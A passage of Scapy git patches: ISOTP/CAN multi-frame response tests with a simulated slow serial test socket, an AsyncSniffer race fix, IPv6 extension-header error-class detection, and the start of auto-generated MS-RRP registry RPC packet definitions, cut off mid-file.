= stim.send(bg_frame) + +stim.send(cf1_frame) +stim.send(cf2_frame) + +with isocan, stim, ISOTPSoftSocket(isocan, 0x641, 0x241) as sock: + pkts = sock.sniff(count=1, timeout=10) + # Stop TimeoutScheduler while sockets are still open. + _ts = TimeoutScheduler._thread + TimeoutScheduler.clear() + if _ts is not None: + _ts.join(timeout=5) + +assert len(pkts) == 1, "MF response not received due to background traffic" +assert pkts[0].data == response_data + += ISOTPSoftSocket MF response with delayed CFs and background traffic + +from threading import Thread, Event + +response_data = b'\x62\xF1\x90' + b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50' + +with TestSocket(CAN) as stim, TestSocket(CAN) as isocan, \ + ISOTPSoftSocket(isocan, 0x641, 0x241) as sock: + stim.pair(isocan) + stop_traffic = Event() + def bg_traffic(): + bg_frame = CAN(identifier=0x456, data=dhex("01 02 03")) + while not stop_traffic.is_set(): + try: + stim.send(bg_frame) + except Exception: + break + time.sleep(0.001) + def delayed_response(): + time.sleep(0.05) + sock.impl.rx_tx_poll_rate = 10 + stim.send(CAN(identifier=0x241, data=dhex("10 13 62 F1 90 41 42 43"))) + time.sleep(0.01) + stim.send(CAN(identifier=0x241, data=dhex("21 44 45 46 47 48 49 4A"))) + time.sleep(0.01) + stim.send(CAN(identifier=0x241, data=dhex("22 4B 4C 4D 4E 4F 50 00"))) + traffic_thread = Thread(target=bg_traffic) + traffic_thread.start() + resp_thread = Thread(target=delayed_response) + resp_thread.start() + pkts = sock.sniff(count=1, timeout=5) + stop_traffic.set() + traffic_thread.join(timeout=5) + resp_thread.join(timeout=5) + assert not traffic_thread.is_alive(), "traffic_thread still alive" + assert not resp_thread.is_alive(), "resp_thread still alive" + # Stop TimeoutScheduler while sockets are still open. + _ts = TimeoutScheduler._thread + TimeoutScheduler.clear() + if _ts is not None: + _ts.join(timeout=5) + +assert len(pkts) == 1, "MF response not received with delayed CFs and slow poll rate" +assert pkts[0].data == response_data + = ISOTPSoftSocket sniff msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') @@ -1261,12 +1459,214 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241 res.show() assert res.data == dhex("01 02 03 04 05 06 07 08 09") + ++ MF response via sr1() cartesian product tests +# Background traffic from pcap: 3 periodic IDs (0x062, 0x024, 0x039) every +# 10ms, plus a burst of 9 additional IDs every 100ms. +# ECU response latency: ~0.6ms after SF request (from pcap frame 385). +# CF timing after FC: CF1 +8ms, CF2 +10ms, CF3 +10ms (from pcap). +# Expected ISOTP data: "62 00 01 flag{UDS_DATA_READ}" (22 bytes). +# +# Cartesian product dimensions: +# threaded: {False, True} - sr1() threading mode +# can_filters: {[0x7eb], None} - per-socket filtering vs. no filtering +# adapter: {limited (slcan-like), unlimited (candle-like)} +# +# slcan model parameters (from real hardware testing): +# frame_delay=0.0025: ~2.5ms per serial read at 115200 baud +# serial_timeout=0.1: python-can slcan Serial(timeout=0.1) blocks 100ms +# when serial buffer is empty +# read_time_limit=0.02: SocketMapper.READ_BUS_TIME_LIMIT = 20ms caps +# total read time per mux call +# prefill_frames=200: OS serial buffer backlog from busy CAN bus +# +# All tests use retry=0, timeout=1.0. All should PASS with the fix +# (can_filters stripped from raw Bus, per-socket filtering in mux, +# read_bus time-limited to avoid TimeoutScheduler thread starvation). + += MF response helper setup for cartesian product tests + +from threading import Thread, Event + +def run_mf_response_test(frame_delay, mux_throttle, filters_kwarg, threaded, + prefill_frames=0, serial_timeout=0.0, + read_time_limit=0.0, interface_name="slcan"): + import time as _time + from threading import Thread as _Thread, Event as _Event + from scapy.layers.can import CAN as _CAN + from scapy.contrib.isotp import ISOTP as _ISOTP + from scapy.contrib.isotp.isotp_soft_socket import ISOTPSoftSocket as _ISOTPSoftSocket + from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler as _TimeoutScheduler + from test.testsocket import TestSocket as _TestSocket, SlowTestSocket as _SlowTestSocket + _dhex = bytes.fromhex + response_data = _dhex("620001666c61677b5544535f444154415f524541447d") + bg_periodic = [0x062, 0x024, 0x039] + bg_burst = [0x1d3, 0x024, 0x039, 0x077, 0x098, 0x150, 0x1a7, 0x1b8, 0x1bb] + if frame_delay > 0: + sock_cls = _SlowTestSocket + sock_kwargs = dict(frame_delay=frame_delay, mux_throttle=mux_throttle, + serial_timeout=serial_timeout, + read_time_limit=read_time_limit, + interface_name=interface_name, + **filters_kwarg) + else: + sock_cls = _TestSocket + sock_kwargs = {} + with sock_cls(_CAN, **sock_kwargs) as isocan, \ + _TestSocket(_CAN) as ecu_mon, \ + _ISOTPSoftSocket(isocan, tx_id=0x7e3, rx_id=0x7eb) as sock: + with _TestSocket(_CAN) as stim: + stim.pair(isocan) + isocan.pair(ecu_mon) + # Pre-fill the serial buffer with background frames to + # simulate a real slcan adapter that has been connected to + # a busy CAN bus. On real hardware the OS serial buffer + # accumulates hundreds of frames before the ISOTP exchange. + for _ in range(prefill_frames): + bid = bg_periodic[_ % len(bg_periodic)] + stim.send(_CAN(identifier=bid, data=bytes(8))) + fc_received = _Event() + stop = _Event() + bg_cycle = [0] + def bg_generator(): + while not stop.is_set(): + for bid in bg_periodic: + if stop.is_set(): + return + stim.send(_CAN(identifier=bid, data=bytes(8))) + bg_cycle[0] += 1 + if bg_cycle[0] % 10 == 0: + for bid in bg_burst: + if stop.is_set(): + return + stim.send(_CAN(identifier=bid, data=bytes(8))) + _time.sleep(0.010) + def ecu_simulation(): + _time.sleep(0.05) + stim.send(_CAN(identifier=0x7eb, data=_dhex("1016620001666c61"))) + fc_received.wait(timeout=10.0) + if not fc_received.is_set(): + return + _time.sleep(0.008) + stim.send(_CAN(identifier=0x7eb, data=_dhex("21677b5544535f44"))) + _time.sleep(0.010) + stim.send(_CAN(identifier=0x7eb, data=_dhex("224154415f524541"))) + _time.sleep(0.010) + stim.send(_CAN(identifier=0x7eb, data=_dhex("23447d"))) + def fc_watcher(): + while not stop.is_set(): + if _TestSocket.select([ecu_mon], 0.1): + pkt = ecu_mon.recv() + if pkt is not None and pkt.identifier == 0x7e3 and \ + len(pkt.data) >= 1 and bytes(pkt.data)[0] == 0x30: + fc_received.set() + return + bg_thread = _Thread(target=bg_generator) + ecu_thread = _Thread(target=ecu_simulation) + fc_thread = _Thread(target=fc_watcher) + bg_thread.start() + ecu_thread.start() + fc_thread.start() + result = sock.sr1(_ISOTP(data=_dhex("220001")), + retry=0, timeout=10.0, + threaded=threaded, verbose=0) + stop.set() + fc_received.set() + bg_thread.join(timeout=5) + ecu_thread.join(timeout=5) + fc_thread.join(timeout=5) + assert not bg_thread.is_alive(), "bg_thread still alive" + assert not ecu_thread.is_alive(), "ecu_thread still alive" + assert not fc_thread.is_alive(), "fc_thread still alive" + # Stop TimeoutScheduler while sockets are still open to + # avoid callbacks crashing on closed sockets and writing + # to stderr (causes fatal error on Python 3.13 Windows). + _ts_thread = _TimeoutScheduler._thread + _TimeoutScheduler.clear() + if _ts_thread is not None: + _ts_thread.join(timeout=5) + return result, response_data + += MF response: candle-like unlimited, no can_filters, threaded=False + +result, expected = run_mf_response_test( + frame_delay=0, mux_throttle=0, + filters_kwarg={}, threaded=False, interface_name="candle") +assert result is not None, "MF response not received (candle, no filters, threaded=False)" +assert result.data == expected + += MF response: candle-like unlimited, no can_filters, threaded=True + +result, expected = run_mf_response_test( + frame_delay=0, mux_throttle=0, + filters_kwarg={}, threaded=True, interface_name="candle") +assert result is not None, "MF response not received (candle, no filters, threaded=True)" +assert result.data == expected + += MF response: candle-like unlimited, can_filters=[0x7eb], threaded=False + +result, expected = run_mf_response_test( + frame_delay=0, mux_throttle=0, + filters_kwarg=dict(can_filters=[0x7eb]), threaded=False, + interface_name="candle") +assert result is not None, "MF response not received (candle, can_filters, threaded=False)" +assert result.data == expected + += MF response: candle-like unlimited, can_filters=[0x7eb], threaded=True + +result, expected = run_mf_response_test( + frame_delay=0, mux_throttle=0, + filters_kwarg=dict(can_filters=[0x7eb]), threaded=True, + interface_name="candle") +assert result is not None, "MF response not received (candle, can_filters, threaded=True)" +assert result.data == expected + += MF response: slcan-like limited, no can_filters, threaded=False + +result, expected = run_mf_response_test( + frame_delay=0.0025, mux_throttle=0.001, serial_timeout=0.1, + read_time_limit=0.02, filters_kwarg={}, threaded=False, + prefill_frames=200) +assert result is not None, "MF response not received (slcan, no filters, threaded=False)" +assert result.data == expected + += MF response: slcan-like limited, no can_filters, threaded=True + +result, expected = run_mf_response_test( + frame_delay=0.0025, mux_throttle=0.001, serial_timeout=0.1, + read_time_limit=0.02, filters_kwarg={}, threaded=True, + prefill_frames=200) +assert result is not None, "MF response not received (slcan, no filters, threaded=True)" +assert result.data == expected + += MF response: slcan-like limited, can_filters=[0x7eb], threaded=False + +result, expected = run_mf_response_test( + frame_delay=0.0025, mux_throttle=0.001, serial_timeout=0.1, + read_time_limit=0.02, filters_kwarg=dict(can_filters=[0x7eb]), + threaded=False, prefill_frames=200) +assert result is not None, "MF response not received (slcan, can_filters, threaded=False)" +assert result.data == expected + += MF response: slcan-like limited, can_filters=[0x7eb], threaded=True + +result, expected = run_mf_response_test( + frame_delay=0.0025, mux_throttle=0.001, serial_timeout=0.1, + read_time_limit=0.02, filters_kwarg=dict(can_filters=[0x7eb]), + threaded=True, prefill_frames=200) +assert result is not None, "MF response not received (slcan, can_filters, threaded=True)" +assert result.data == expected + + + Cleanup = Delete testsockets cleanup_testsockets() +_ts = TimeoutScheduler._thread TimeoutScheduler.clear() +if _ts is not None: + _ts.join(timeout=5) log_runtime.removeHandler(handler) diff --git a/test/testsocket.py b/test/testsocket.py index d1a90a4da51..1ecd79f4fec 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -178,6 +178,172 @@ def recv(self, x=MTU, **kwargs): return super(UnstableSocket, self).recv(x, **kwargs) +class SlowTestSocket(TestSocket): + """A TestSocket that simulates the mux/throttle behavior of + PythonCANSocket on a slow serial interface (like slcan). + + Frames sent to this socket go into an intermediate serial buffer. + They only become visible to recv()/select() after mux() moves + them to the rx ObjectPipe. + + Key parameters model the real slcan timing bottleneck: + - frame_delay: per-frame serial read time (~2-3ms on real slcan) + - serial_timeout: blocking wait when serial buffer is empty. + Real python-can slcan uses serial.Serial(timeout=0.1), so + bus.recv(timeout=0) blocks for 100ms when buffer is empty. + - read_time_limit: max time spent reading per mux call, matching + SocketMapper.READ_BUS_TIME_LIMIT in production code. + + can_filters: Optional list of CAN identifiers for per-socket + filtering. When set, mux reads all frames but only delivers + matching ones, like SocketMapper.distribute() + _matches_filters. + """ + + def __init__(self, basecls=None, frame_delay=0.0002, + mux_throttle=0.001, can_filters=None, + serial_timeout=0.0, read_time_limit=0.0, + interface_name="slcan"): + # type: (Optional[Type[Packet]], float, float, Optional[List[int]], float, float, str) -> None # noqa: E501 + """ + :param frame_delay: Simulated per-frame serial read time (seconds). + :param mux_throttle: Minimum time between mux calls (default 1ms). + :param can_filters: Optional list of CAN identifiers for filtering. + :param serial_timeout: Time to block when serial buffer is empty + (models python-can slcan serial.Serial(timeout=0.1)). + Set to 0.1 to reproduce real slcan behavior. + :param read_time_limit: Max time per mux read pass (seconds). + Set to 0.02 to match SocketMapper.READ_BUS_TIME_LIMIT. + When 0 (default), no time limit is applied. + :param interface_name: Simulated interface name (default "slcan"). + Used in test descriptions to identify the adapter type. + """ + super(SlowTestSocket, self).__init__(basecls) + self.interface_name = interface_name + from collections import deque + self._serial_buffer = deque() # type: deque[bytes] + self._serial_lock = Lock() + self._last_mux = 0.0 + self._frame_delay = frame_delay + self._mux_throttle = mux_throttle + self._can_filters = can_filters + self._serial_timeout = serial_timeout + self._read_time_limit = read_time_limit + self._real_ins = self.ins + self.ins = _SlowPipeWrapper(self) # type: ignore[assignment] + + @staticmethod + def _extract_can_id(frame): + # type: (bytes) -> int + """Extract CAN identifier from raw CAN frame bytes.""" + import struct + if len(frame) < 4: + return -1 + return int(struct.unpack('!I', frame[:4])[0] & 0x1FFFFFFF) + + def _mux(self): + # type: () -> None + """Move frames from serial buffer to rx ObjectPipe. + + Models the real PythonCANSocket read path: + 1. read_bus(): loop calling bus.recv(timeout=0) — each call + takes frame_delay when data is available, or serial_timeout + when the buffer is empty (modeling slcan serial timeout). + 2. distribute(): deliver matching frames to the ObjectPipe. + + With read_time_limit > 0, the read loop stops after that many + seconds (matching SocketMapper.READ_BUS_TIME_LIMIT). + """ + now = time.monotonic() + if now - self._last_mux < self._mux_throttle: + return + + # Phase 1: read_bus — read frames from serial buffer + msgs = [] + deadline = time.monotonic() + self._read_time_limit \ + if self._read_time_limit > 0 else None + while True: + if self.closed: + break + with self._serial_lock: + if self._serial_buffer: + frame = self._serial_buffer.popleft() + else: + frame = None + if frame is None: + # Empty buffer: model the serial timeout blocking + if self._serial_timeout > 0: + time.sleep(self._serial_timeout) + break + if self._frame_delay > 0: + time.sleep(self._frame_delay) + msgs.append(frame) + if deadline and time.monotonic() >= deadline: + break + + # Phase 2: distribute — apply per-socket filtering + for frame in msgs: + if self._can_filters is not None: + can_id = self._extract_can_id(frame) + if can_id not in self._can_filters: + continue + self._real_ins.send(frame) + + self._last_mux = time.monotonic() + + def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Read from the rx ObjectPipe (populated by mux via select).""" + return self.basecls, self._real_ins.recv(0), time.time() + + def send(self, x): + # type: (Packet) -> int + if self._frame_delay > 0: + time.sleep(self._frame_delay) + return super(SlowTestSocket, self).send(x) + + @staticmethod + def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + for s in sockets: + if isinstance(s, SlowTestSocket): + s._mux() + return select_objects(sockets, remain) + + def close(self): + # type: () -> None + self.ins = self._real_ins + super(SlowTestSocket, self).close() + + +class _SlowPipeWrapper: + """Wrapper that intercepts send() to route into serial buffer.""" + def __init__(self, owner): + # type: (SlowTestSocket) -> None + self._owner = owner + + def send(self, data): + # type: (bytes) -> None + with self._owner._serial_lock: + self._owner._serial_buffer.append(data) + + def recv(self, timeout=0): + # type: (int) -> Optional[bytes] + return self._owner._real_ins.recv(timeout) + + def fileno(self): + # type: () -> int + return self._owner._real_ins.fileno() + + def close(self): + # type: () -> None + self._owner._real_ins.close() + + @property + def closed(self): + # type: () -> bool + return bool(self._owner._real_ins.closed) # type: ignore[attr-defined] + + def cleanup_testsockets(): # type: () -> None """ From ed0707e84396b4db5382d281b86f85997cb13613 Mon Sep 17 00:00:00 2001 From: schaap Date: Tue, 3 Mar 2026 08:01:35 +0100 Subject: [PATCH 1605/1632] Resolve race condition when starting AsyncSniffer (#4912) --- scapy/sendrecv.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index ec74872418c..3b119a1e905 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1314,9 +1314,9 @@ def stop_cb(): self.stop_cb = stop_cb try: + self.continue_sniff = True if started_callback: started_callback() - self.continue_sniff = True # Start timeout if timeout is not None: From 85825ed5515fda3b079d4d9a926f06f81648796f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 10 Feb 2026 18:48:50 +0100 Subject: [PATCH 1606/1632] Detect TCPError/UDPerror/SCTPerror after IPv6 Extension Headers --- scapy/layers/inet6.py | 14 +++++++++++++- scapy/layers/sctp.py | 4 +++- test/scapy/layers/inet6.uts | 9 ++++++++- 3 files changed, 24 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index dc101664796..4645a5e1344 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -693,11 +693,23 @@ def in6_chksum(nh, u, p): ############################################################################# ############################################################################# +nh_clserror = {socket.IPPROTO_TCP: TCPerror, + socket.IPPROTO_UDP: UDPerror} + # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPv6 Option Header' - aliastypes = [IPv6, IPerror6] # TODO ... + aliastypes = [IPv6] + + def guess_payload_class(self, payload): + if self.nh in nh_clserror: + underlayer = self.underlayer + while underlayer: + if isinstance(underlayer, IPerror6): + return nh_clserror[self.nh] + underlayer = underlayer.underlayer + return super(_IPv6ExtHdr, self).guess_payload_class(payload) # IPv6 options for Extension Headers # diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index 9e6c6049d46..1d002dcc5b0 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -37,7 +37,7 @@ ) from scapy.data import SCTP_SERVICES from scapy.layers.inet import IP, IPerror -from scapy.layers.inet6 import IP6Field, IPv6, IPerror6 +from scapy.layers.inet6 import IP6Field, IPv6, IPerror6, nh_clserror IPPROTO_SCTP = 132 @@ -304,6 +304,8 @@ def mysummary(self): return Packet.mysummary(self) +nh_clserror[IPPROTO_SCTP] = SCTPerror + # SCTP Chunk variable params diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 4ec0295cac1..eb0079de8cf 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1996,7 +1996,7 @@ def test_getmacbyip6(mock_route6, mock_neighsol): test_getmacbyip6() == "05:04:03:02:01:00" -= IPv6 - IPerror6 & UDPerror & _ICMPv6Error += IPv6 - IPerror6 & UDPerror & _ICMPv6Error & TCPerror query = IPv6(dst="2001:db8::1", src="2001:db8::2", hlim=1)/UDP()/DNS() answer = IPv6(dst="2001:db8::2", src="2001:db8::1", hlim=1)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::2", hlim=0)/UDPerror()/DNS() @@ -2007,6 +2007,13 @@ from scapy.layers.inet6 import _ICMPv6Error assert _ICMPv6Error().guess_payload_class(None) == IPerror6 assert _ICMPv6Error().hashret() == b'' +# Test with extension header +# From: +# pkt = IPv6() / ICMPv6DestUnreach() / IPerror6 () / IPv6ExtHdrFragment(nh=6) / TCPerror() +raw_pkt = b'`\x00\x00\x00\x00L:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00l5\x00\x00\x00\x00`\x00\x00\x00\x00\x1c,@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' +IPv6(raw_pkt).summary() +assert TCPerror in IPv6(raw_pkt) + = reset routes properly conf.ifaces.reload() From 3147e108a3d9bdf93e527206fefbcdd372b06b3d Mon Sep 17 00:00:00 2001 From: Ebrix <8287617+Ebrix@users.noreply.github.com> Date: Mon, 3 Nov 2025 08:30:14 +0100 Subject: [PATCH 1607/1632] Implement [MS-RRP] RPC manipulation & various other changes This PR also: - regroups windows helpers in a scapy/layers/windows folder --- scapy/layers/kerberos.py | 2 +- scapy/layers/ldap.py | 2 +- scapy/layers/msrpce/msnrpc.py | 4 +- scapy/layers/msrpce/mspac.py | 2 +- scapy/layers/msrpce/raw/ms_rrp.py | 747 +++++++++++++++++ scapy/layers/msrpce/rpcclient.py | 4 +- scapy/layers/smb.py | 2 +- scapy/layers/smb2.py | 902 +-------------------- scapy/layers/smbclient.py | 13 +- scapy/layers/smbserver.py | 2 +- scapy/layers/windows/__init__.py | 17 + scapy/layers/windows/erref.py | 76 ++ scapy/layers/windows/registry.py | 903 +++++++++++++++++++++ scapy/layers/windows/security.py | 931 ++++++++++++++++++++++ scapy/modules/ldaphero.py | 2 +- scapy/modules/ticketer.py | 2 +- test/scapy/layers/msrpce/mslsad.uts | 2 +- test/scapy/layers/smb2.uts | 2 + test/scapy/layers/tls/tlsclientserver.uts | 15 +- 19 files changed, 2704 insertions(+), 926 deletions(-) create mode 100644 scapy/layers/msrpce/raw/ms_rrp.py create mode 100644 scapy/layers/windows/__init__.py create mode 100644 scapy/layers/windows/erref.py create mode 100644 scapy/layers/windows/registry.py create mode 100644 scapy/layers/windows/security.py diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a282e80998b..a187c39fa3b 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -146,7 +146,6 @@ ) from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION -from scapy.layers.smb2 import STATUS_ERREF from scapy.layers.tls.cert import ( Cert, CertList, @@ -161,6 +160,7 @@ Hash_SHA512, ) from scapy.layers.tls.crypto.groups import _ffdh_groups +from scapy.layers.windows.erref import STATUS_ERREF from scapy.layers.x509 import ( _CMS_ENCAPSULATED, CMS_ContentInfo, diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index cdb540ec7da..923c54d9281 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -99,7 +99,7 @@ NETLOGON, NETLOGON_SAM_LOGON_RESPONSE_EX, ) -from scapy.layers.smb2 import STATUS_ERREF +from scapy.layers.windows.erref import STATUS_ERREF # Typing imports from typing import ( diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index 5933889c2d5..20e2355c18c 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -37,8 +37,8 @@ from scapy.layers.msrpce.rpcclient import ( DCERPC_Client, DCERPC_Transport, - STATUS_ERREF, ) +from scapy.layers.windows.erref import STATUS_ERREF from scapy.layers.msrpce.raw.ms_nrpc import ( NetrServerAuthenticate3_Request, NetrServerAuthenticate3_Response, @@ -610,7 +610,7 @@ def __init__( def connect(self, host, **kwargs): """ - This calls DCERPC_Client's connect_and_bind to bind the 'logon' interface. + This calls DCERPC_Client's connect to bind the 'logon' interface. """ super(NetlogonClient, self).connect( host=host, diff --git a/scapy/layers/msrpce/mspac.py b/scapy/layers/msrpce/mspac.py index 6185673c804..1a96a9afd13 100644 --- a/scapy/layers/msrpce/mspac.py +++ b/scapy/layers/msrpce/mspac.py @@ -68,7 +68,7 @@ _NTLMPayloadField, _NTLMPayloadPacket, ) -from scapy.layers.smb2 import WINNT_SID +from scapy.layers.windows.security import WINNT_SID # sect 2.4 diff --git a/scapy/layers/msrpce/raw/ms_rrp.py b/scapy/layers/msrpce/raw/ms_rrp.py new file mode 100644 index 00000000000..617b4f555d5 --- /dev/null +++ b/scapy/layers/msrpce/raw/ms_rrp.py @@ -0,0 +1,747 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy RPC +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +# [ms-rrp] v39.0 (Mon, 21 Oct 2024) + +""" +RPC definitions for the following interfaces: +- winreg (v1.0): 338CD001-2244-31F1-AAAA-900038001003 +This file is auto-generated by midl-to-scapy, do not modify. +""" + +import uuid + +from scapy.fields import PacketListField +from scapy.layers.dcerpc import ( + NDRPacket, + DceRpcOp, + NDRByteField, + NDRConfStrLenField, + NDRConfVarPacketListField, + NDRConfVarStrLenField, + NDRConfVarStrLenFieldUtf16, + NDRContextHandle, + NDRFullEmbPointerField, + NDRFullPointerField, + NDRIntField, + NDRPacketField, + NDRShortField, + register_dcerpc_interface, +) + + +class OpenClassesRoot_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenClassesRoot_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class OpenCurrentUser_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenCurrentUser_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class OpenLocalMachine_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenLocalMachine_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class OpenPerformanceData_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenPerformanceData_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class OpenUsers_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRShortField("ServerName", 0)), + NDRIntField("samDesired", 0), + ] + + +class OpenUsers_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class BaseRegCloseKey_Request(NDRPacket): + fields_desc = [NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle)] + + +class BaseRegCloseKey_Response(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("status", 0), + ] + + +class RPC_UNICODE_STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", None, size_of="Buffer", adjust=lambda _, x: (x * 2)), + NDRShortField( + "MaximumLength", None, size_of="Buffer", adjust=lambda _, x: (x * 2) + ), + NDRFullEmbPointerField( + NDRConfVarStrLenFieldUtf16( + "Buffer", + "", + size_is=lambda pkt: (pkt.MaximumLength // 2), + length_is=lambda pkt: (pkt.Length // 2), + ) + ), + ] + + +class RPC_SECURITY_DESCRIPTOR(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRConfVarStrLenField( + "lpSecurityDescriptor", + "", + size_is=lambda pkt: pkt.cbInSecurityDescriptor, + length_is=lambda pkt: pkt.cbOutSecurityDescriptor, + ) + ), + NDRIntField("cbInSecurityDescriptor", None, size_of="lpSecurityDescriptor"), + NDRIntField("cbOutSecurityDescriptor", None, size_of="lpSecurityDescriptor"), + ] + + +class PRPC_SECURITY_ATTRIBUTES(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("nLength", 0), + NDRPacketField( + "RpcSecurityDescriptor", RPC_SECURITY_DESCRIPTOR(), RPC_SECURITY_DESCRIPTOR + ), + NDRByteField("bInheritHandle", 0), + ] + + +class BaseRegCreateKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRPacketField("lpClass", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRIntField("dwOptions", 0), + NDRIntField("samDesired", 0), + NDRFullPointerField( + NDRPacketField( + "lpSecurityAttributes", + PRPC_SECURITY_ATTRIBUTES(), + PRPC_SECURITY_ATTRIBUTES, + ) + ), + NDRFullPointerField(NDRIntField("lpdwDisposition", 0)), + ] + + +class BaseRegCreateKey_Response(NDRPacket): + fields_desc = [ + NDRPacketField("phkResult", NDRContextHandle(), NDRContextHandle), + NDRFullPointerField(NDRIntField("lpdwDisposition", 0)), + NDRIntField("status", 0), + ] + + +class BaseRegDeleteKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpSubKey", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegDeleteKey_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class BaseRegDeleteValue_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRPacketField("lpValueName", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + ] + + +class BaseRegDeleteValue_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class PFILETIME(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [NDRIntField("dwLowDateTime", 0), NDRIntField("dwHighDateTime", 0)] + + +class PRPC_UNICODE_STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", None, size_of="Buffer", adjust=lambda _, x: (x * 2)), + NDRShortField( + "MaximumLength", None, size_of="Buffer", adjust=lambda _, x: (x * 2) + ), + NDRFullEmbPointerField( + NDRConfVarStrLenFieldUtf16( + "Buffer", + "", + size_is=lambda pkt: (pkt.MaximumLength // 2), + length_is=lambda pkt: (pkt.Length // 2), + ) + ), + ] + + +class BaseRegEnumKey_Request(NDRPacket): + fields_desc = [ + NDRPacketField("hKey", NDRContextHandle(), NDRContextHandle), + NDRIntField("dwIndex", 0), + NDRPacketField("lpNameIn", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField( + NDRPacketField("lpClassIn", RPC_UNICODE_STRING(), RPC_UNICODE_STRING) + ), + NDRFullPointerField( + NDRPacketField("lpftLastWriteTime", PFILETIME(), PFILETIME) + ), + ] + + +class BaseRegEnumKey_Response(NDRPacket): + fields_desc = [ + NDRPacketField("lpNameOut", RPC_UNICODE_STRING(), RPC_UNICODE_STRING), + NDRFullPointerField( + NDRPacketField("lplpClassOut", PRPC_UNICODE_STRING(), PRPC_UNICODE_STRING) + ), + NDRFullPointerField( + NDRPacketField("lpftLastWriteTime", PFILETIME(), PFILETIME) + ), + NDRIntField("status", 0), + ] + + +class BaseRegEnumValue_Request(NDRPacket): + fields_desc 